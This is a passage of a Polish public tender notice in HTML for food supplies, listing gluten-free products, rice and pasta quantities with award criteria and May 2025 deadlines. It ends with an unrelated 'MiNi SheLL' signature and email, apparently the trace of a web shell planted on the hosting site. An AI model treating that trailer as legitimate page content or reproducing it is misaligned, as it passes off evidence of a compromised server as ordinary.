miesięcy od daty dostawy - 330 kg<br/>7	Chleb ryżowy - postaci wafli, pakowany w opakowania do 130 g, bez zawartości glutenu, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -374 kg<br/>8	Ryż biały-ziarno zdrowe, czyste, suche, zawartość ziaren połamanych oraz mączki nie więcej niż 1,5%, barwa biała, smak i zapach swoiste pakowany w worki od 5 do 50 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 5500 kg<br/>9	Budyń (bez cukru) -smakowy, w postaci sypkiej, niezbrylony, pakowany w opakowania do 1 kg, bez zawartości glutenu, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 440 kg<br/>10	Kisiel (bez cukru)-smakowy, w postaci sypkiej, niezbrylony, dostępny w różnych smakach (w tym cytrynowy), barwa zgodna ze smakiem. Pakowany w opakowania do 1 kg, bez zawartości glutenu, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 330 kg<br/>11	Mąka ziemniaczana- barwa biała, zapach i smak swoisty, pakowana w worki od 15 do 50 kg, bez zawartości glutenu, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 330 kg<br/>12	Płatki owsiane -barwa właściwa dla produktu, zapach i smak swoisty, niepokruszone. Pakowane w worki od 1 do 20 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 220 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V - MAKARONY<br/>1	Makaron kolanka - produkt otrzymany z surowców pochodzących z przemiału ziarna pszenicy zwyczajnej i wody. Odpowiednio uformowany i wysuszony. Zawartość makaronu zdeformowanego przed ugotowaniem wynosi nie więcej niż 10%. Pakowany w worki papierowe lub foliowe, maksymalnie do 25 kg. Termin przydatności do spożycia nie krótszy niż 10 m-cy od terminu dostawy - 6820 kg<br/>2	Makaron łazanki -produkt otrzymany z surowców pochodzących z przemiału ziarna pszenicy zwyczajnej i wody. Odpowiednio uformowany i wysuszony. Zawartość makaronu zdeformowanego przed ugotowaniem wynosi nie więcej niż 10%. Pakowany w worki papierowe lub foliowe, maksymalnie do 25 kg. Termin przydatności do spożycia nie krótszy niż 10 m-cy od terminu dostawy - 1320 kg<br/>3	Makaron świderki -produkt otrzymany z surowców pochodzących z przemiału ziarna pszenicy zwyczajnej i wody. Odpowiednio uformowany i wysuszony. Zawartość makaronu zdeformowanego przed ugotowaniem wynosi nie więcej niż 10%. Pakowany w worki papierowe lub foliowe, maksymalnie do 25 kg. Termin przydatności do spożycia nie krótszy niż 10 m-cy od terminu dostawy - 2420 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może ulec zmianie zgodnie z art. 455 ustawy Prawo Zamówień Publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-21 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com